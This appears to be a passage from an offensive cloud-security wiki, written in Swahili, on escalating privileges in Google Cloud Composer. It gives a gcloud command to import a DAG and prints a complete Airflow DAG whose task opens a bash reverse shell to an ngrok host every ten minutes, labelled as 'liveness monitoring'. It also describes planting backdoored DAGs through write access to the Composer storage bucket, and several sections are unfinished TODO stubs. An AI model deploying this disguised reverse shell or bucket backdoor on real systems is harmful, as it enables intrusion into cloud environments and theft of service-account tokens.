Inawezekana kuunganisha akaunti yoyote ya huduma kwenye mazingira mapya ya composer yenye ruhusa hiyo. Baadaye unaweza kutekeleza msimbo ndani ya composer ili kuiba token ya akaunti ya huduma.
Ongeza msimbo wa python DAG kwenye faili na uingize kwa kukimbia:
# TODO: Create dag to get a rev shellgcloudcomposerenvironmentsstoragedagsimport--environmenttest--locationus-central1--source/tmp/dags/reverse_shell.py
Reverse shell DAG:
reverse_shell.py
import airflowfrom airflow import DAGfrom airflow.operators.bash_operator import BashOperatorfrom datetime import timedeltadefault_args ={'start_date': airflow.utils.dates.days_ago(0),'retries':1,'retry_delay':timedelta(minutes=5)}dag =DAG('reverse_shell',default_args=default_args,description='liveness monitoring dag',schedule_interval='*/10 * * * *',max_active_runs=1,catchup=False,dagrun_timeout=timedelta(minutes=10),)# priority_weight has type int in Airflow DB, uses the maximum.t1 =BashOperator(task_id='bash_rev',bash_command='bash -i >& /dev/tcp/0.tcp.eu.ngrok.io/14382 0>&1',dag=dag,depends_on_past=False,priority_weight=2**31-1,do_xcom_push=False)
Kuandika Upatikanaji kwa Composer bucket
Vipengele vyote vya mazingira ya composer (DAGs, plugins na data) vinahifadhiwa ndani ya GCP bucket. Ikiwa mshambuliaji ana ruhusa za kusoma na kuandika juu yake, anaweza kufuatilia bucket na wakati wowote DAG inaundwa au inasasishwa, kuwasilisha toleo lililo na backdoor ili mazingira ya composer yapate toleo hilo lililo na backdoor kutoka kwenye hifadhi.
Pata maelezo zaidi kuhusu shambulio hili katika:
Ingiza Plugins
TODO: Angalia ni nini kinaweza kuathiriwa kwa kupakia plugins
Ingiza Data
TODO: Angalia ni nini kinaweza kuathiriwa kwa kupakia data